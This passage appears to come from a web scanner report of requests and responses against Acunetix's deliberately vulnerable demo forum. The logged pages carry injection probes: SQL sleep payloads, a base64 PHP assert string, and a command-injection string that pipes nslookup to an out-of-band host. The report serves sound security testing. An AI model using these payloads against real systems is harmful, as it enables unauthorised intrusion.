href='showthread.asp?id=57'>0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:22 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=58'>(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:23 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=59'>1'"</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:38 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=60'>1</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:42 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=61'>@@NiQ6e</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:43 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=62'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:15:49 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=63'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:15 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=64'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:15 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=65'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:16 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=66'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=67'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:17 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=68'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:18 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=69'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:19 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=70'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:19 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=71'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=72'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:20 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=73'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:21 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=74'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:22 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=75'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:38 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=76'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:54 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=77'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:16:54 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=78'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:01 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=79'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:01 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=80'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:02 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=81'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:05 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=82'>Mr.</a></div></td><td>1</td><td>XcwJRDFY</td><td>12/14/2022 3:17:06 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=83'>Mr.</a></div></td><td>1</td><td>sOdPqaAH</td><td>12/14/2022 3:23:34 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showforum.asp?id=1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 324 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3077 |
Response Body - size: 3,077 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Weather</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Weather </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>1</a></div></td><td>1</td><td>admin</td><td>11/9/2005 12:16:35 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 324 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 2933 |
Response Body - size: 2,933 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4125 |
Response Body - size: 4,125 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4164 |
Response Body - size: 4,164 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 12345'"\'\");|]* </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/12345'"\'\");|]* </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>12345'"\'\");|]* - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4174 |
Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4216 |
Response Body - size: 4,216 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>|(nslookup hitcsjqyrtmawb4020.bxss.me||perl -e "gethostbyname('hitcsjqyrtmawb4020.bxss.me')")</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
